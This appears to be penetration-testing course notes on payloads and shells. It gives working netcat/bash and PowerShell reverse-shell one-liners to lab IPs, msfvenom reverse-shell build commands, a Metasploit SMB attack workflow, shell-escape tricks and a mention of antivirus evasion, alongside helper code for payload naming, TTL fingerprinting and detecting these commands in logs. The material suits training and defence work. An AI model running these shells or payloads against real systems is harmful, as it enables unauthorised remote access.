Shells & Payloads: Payloads Overview

Payloads Overview

Types of Payloads

  • Staged Payloads

    • Sends initial stage first, then downloads main payload

    • Better for environments with sufficient memory

    • Example naming: windows/meterpreter/reverse_tcp

  • Stageless Payloads

    • Entire payload sent at once

    • Ideal for low-bandwidth environments

    • Example naming: windows/meterpreter_reverse_tcp

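The naming rule above (a `/` between the stage and the transport for staged payloads, an `_` for stageless ones) can be read off a payload name mechanically. The following parser is an added example, not code from the original page or from Metasploit; the architecture and transport token lists it uses are assumptions kept short for illustration.

```python
"""Parse Metasploit-style payload names and tell staged from stageless.

Added example, not code from the original page or from Metasploit. It
encodes only the naming rule the page states: a '/' between stage and
transport (windows/meterpreter/reverse_tcp) means staged, an '_'
(windows/meterpreter_reverse_tcp) means stageless. The architecture and
transport token lists below are assumptions kept small for illustration.
"""
from dataclasses import dataclass
from typing import Optional

# Architecture tokens that may follow the platform (assumed list).
ARCH_TOKENS = {"x86", "x64", "aarch64", "armle", "mipsbe", "mipsle"}

# Transport suffixes used to split the stageless "stage_transport" form
# (assumed list; longer names first so "reverse_https" wins over "reverse_http").
TRANSPORTS = ("reverse_https", "reverse_http", "reverse_tcp", "bind_tcp")


@dataclass(frozen=True)
class PayloadName:
    platform: str          # e.g. "windows", "linux"
    arch: Optional[str]    # e.g. "x64", or None when the name omits it
    stage: str             # e.g. "meterpreter", "shell"
    transport: str         # e.g. "reverse_tcp"
    staged: bool           # True for stage/transport, False for stage_transport


def parse_payload_name(name: str) -> PayloadName:
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest and rest[0] in ARCH_TOKENS else None
    if len(rest) == 2:
        # Stage and transport are separate path components: a staged payload
        # whose small stager fetches the full stage after connecting.
        stage, transport = rest
        return PayloadName(platform, arch, stage, transport, staged=True)
    if len(rest) == 1:
        # One component joined with '_': a stageless payload delivered whole.
        token = rest[0]
        for transport in TRANSPORTS:
            if token.endswith("_" + transport):
                stage = token[: -(len(transport) + 1)]
                return PayloadName(platform, arch, stage, transport, staged=False)
        raise ValueError(f"unrecognised transport in {name!r}")
    raise ValueError(f"unexpected payload path shape: {name!r}")


def is_staged(name: str) -> bool:
    return parse_payload_name(name).staged


if __name__ == "__main__":
    for n in ("windows/meterpreter/reverse_tcp", "windows/meterpreter_reverse_tcp",
              "linux/x64/shell_reverse_tcp"):
        print(n, "->", parse_payload_name(n))
```

The distinction matters beyond naming: a staged listener must serve the second stage over the network, which is one more transfer for network monitoring to see, whereas a stageless payload is larger on disk but makes a single connection.
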
Essential Payload Commands

Netcat/Bash Reverse Shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

PowerShell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"

MSFvenom Payload Generation

  • List Available Payloads

    msfvenom -l payloads

  • Linux Payload Creation

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf

  • Windows Payload Creation

    msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Windows System Infiltration

Fingerprinting Windows Hosts

  • TTL Check via Ping

    ping <target_ip>    # Look for TTL=128 or 32

  • Nmap OS Detection

    sudo nmap -v -O <target_ip>
    sudo nmap -v -A <target_ip>    # Aggressive scan

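The TTL check works because each stack starts replies with a default TTL and every router on the path decrements it by one, so the observed value rounded up to the nearest default gives both the likely OS family and the hop count. The following helper is an added example, not code from the original page; its table of default TTLs is a heuristic assumption, and the ping lines it parses are constructed samples.

```python
"""Infer a host's likely OS family from the TTL seen in ping replies.

Added example, not code from the original page. It applies the heuristic
the page hints at (TTL=128 or 32 points to Windows): each stack starts
with a default TTL, every router decrements it by one, so the observed
value is rounded up to the nearest default to recover both the default
and the hop count. The default table is an assumption, not a standard.
"""
import re
from typing import Optional, Tuple

# Default initial TTLs of common stacks (assumed heuristic table).
INITIAL_TTLS = {
    32: "older Windows (9x/NT era)",
    64: "Linux/Unix/macOS",
    128: "Windows",
    255: "network device / Solaris",
}

# Matches "ttl=127" from Linux ping and "TTL=128" from Windows ping.
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def ttl_from_ping_line(line: str) -> Optional[int]:
    """Extract the TTL from one line of ping output, or None if absent."""
    m = TTL_RE.search(line)
    return int(m.group(1)) if m else None


def classify_ttl(observed: int) -> Tuple[int, int, str]:
    """Return (assumed initial TTL, hops traversed, OS family guess)."""
    if not 1 <= observed <= 255:
        raise ValueError(f"TTL out of range: {observed}")
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return initial, initial - observed, INITIAL_TTLS[initial]
    raise AssertionError("unreachable: 255 is the largest default")


def fingerprint_ping_output(text: str) -> Optional[Tuple[int, int, str]]:
    """Classify the first reply line in a ping transcript, None if no reply."""
    for line in text.splitlines():
        ttl = ttl_from_ping_line(line)
        if ttl is not None:
            return classify_ttl(ttl)
    return None


if __name__ == "__main__":
    # Constructed sample transcript, not captured output.
    sample = ("PING 10.10.10.5 (10.10.10.5) 56(84) bytes of data.\n"
              "64 bytes from 10.10.10.5: icmp_seq=1 ttl=127 time=0.4 ms\n")
    print(fingerprint_ping_output(sample))
```

The guess is only as good as the implied hop count: an observed TTL of 30 is rounded to 32 (two hops, old Windows) but could equally be a Linux host 34 hops away, so treat the result as a hint and confirm it with the Nmap OS detection the page lists next.
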
Key Windows Ports

  • 139, 445: NetBIOS/SMB

  • 135: MSRPC

  • 443: HTTPS

Common Windows Payloads

  1. DLLs: For privilege escalation and UAC bypass

  2. Batch Files (.bat): Automation scripts

  3. VBScript (.vbs): Client-side automation

  4. MSI Files: Installation packages

  5. PowerShell Scripts: System automation and exploitation

Metasploit Attack Workflow

# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit

Linux System Infiltration

Pre-Exploitation Checklist

Interactive Shell Spawning Methods

  • Python TTY Shell

    python -c 'import pty; pty.spawn("/bin/sh")'

  • Basic Shell Spawning

    /bin/sh -i
    perl -e 'exec "/bin/sh";'
    ruby -e 'exec "/bin/sh";'
    lua -e 'os.execute("/bin/sh")'
    awk 'BEGIN {system("/bin/sh")}'

  • VIM Shell Escape

    vim -c ':!/bin/sh'
    # Or in VIM:
    :set shell=/bin/sh
    :shell

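The netcat/bash and PowerShell reverse shells under Essential Payload Commands and the interpreter and editor shell escapes above all leave distinctive command lines in process-creation logs, which is what a detection engineer looks for. The following scanner is an added example, not code from the original page or from any product: the record format (timestamp, parent process, cmd="...") and the regex rules are assumptions for illustration, and the log records are constructed samples, two of them benign.

```python
"""Flag shell-spawning and reverse-shell command lines in process logs.

Added example, not code from the original page or any product. It runs a
few regex rules over constructed process-creation records; the record
format (timestamp, parent, cmd="...") and the rules are assumptions for
illustration. The rules look for the features of the netcat/bash and
PowerShell reverse shells and of the interpreter and editor shell
escapes shown in this section.
"""
import re
from typing import List, Optional, Set, Tuple

# Constructed sample records, not real telemetry. Two are benign.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z parent=apache2 cmd="sh -c rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f"
2024-05-01T10:00:02Z parent=cron cmd="python3 /opt/app/manage.py runserver"
2024-05-01T10:00:03Z parent=sh cmd="python -c 'import pty; pty.spawn("/bin/sh")'"
2024-05-01T10:00:04Z parent=w3wp.exe cmd="powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream()"
2024-05-01T10:00:05Z parent=sh cmd="vim -c ':!/bin/sh'"
2024-05-01T10:00:06Z parent=bash cmd="awk 'BEGIN {system("/bin/sh")}'"
2024-05-01T10:00:07Z parent=sshd cmd="perl -e 'exec "/bin/sh";'"
2024-05-01T10:00:08Z parent=bash cmd="ls -la /var/www"
"""

# Greedy .* so the command line may itself contain double quotes.
RECORD_RE = re.compile(r'^(?P<ts>\S+)\s+parent=(?P<parent>\S+)\s+cmd="(?P<cmd>.*)"\s*$')

RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # named pipe feeding a shell whose output is piped into netcat
    ("fifo_reverse_shell", re.compile(r"mkfifo\b.*\|\s*(nc|ncat|netcat)\b")),
    # interactive shell piped into a network client
    ("interactive_shell_to_net", re.compile(r"\b(ba)?sh\s+-i\b.*\|\s*(nc|ncat|netcat)\b")),
    # PowerShell opening a raw TCP socket from the command line
    ("powershell_tcpclient", re.compile(r"System\.Net\.Sockets\.TCPClient", re.IGNORECASE)),
    # Python pty upgrade of a dumb shell
    ("python_pty_spawn", re.compile(r"pty\.spawn\(")),
    # scripting interpreters exec'ing a shell
    ("interpreter_exec_shell", re.compile(
        r"\b(perl|ruby|lua|awk)\b.*\b(exec|system|os\.execute)\s*\(?\s*[\"']/bin/(ba)?sh")),
    # vi/vim shell escape, either on the command line or via :shell
    ("editor_shell_escape", re.compile(r"\bvim?\b.*(:!|:shell\b|:set\s+shell=)")),
]


def parse_record(line: str) -> Optional[Tuple[str, str, str]]:
    """Split one record into (timestamp, parent, cmd); None if malformed."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    return m.group("ts"), m.group("parent"), m.group("cmd")


def detect_shell_spawns(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (rule, parent, cmd) for every rule that fires on a record."""
    hits: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        _, parent, cmd = rec
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, parent, cmd))
    return hits


def flagged_commands(log_text: str) -> Set[str]:
    """Distinct command lines that triggered at least one rule."""
    return {cmd for _, _, cmd in detect_shell_spawns(log_text)}


if __name__ == "__main__":
    for rule, parent, cmd in detect_shell_spawns(SAMPLE_LOG):
        print(f"[{rule}] parent={parent} cmd={cmd}")
```

The parent process is kept in every hit on purpose: a shell or interpreter spawned by a web server (apache2, w3wp.exe) or by sshd is a far stronger signal than the same command typed by an interactive user, and that context is what turns a pattern match into a triageable alert.
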
Permission Checks

# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l

Best Practices

Pre-Exploitation

  • Always perform thorough reconnaissance

  • Document all findings and attempted exploits

  • Verify target scope and permissions

Post-Exploitation

  • Maintain access securely

  • Document all changes made to the system

  • Clean up after testing is complete

Security Considerations

  • Use staged payloads for better reliability

  • Consider antivirus evasion techniques

  • Always use secure channels for communication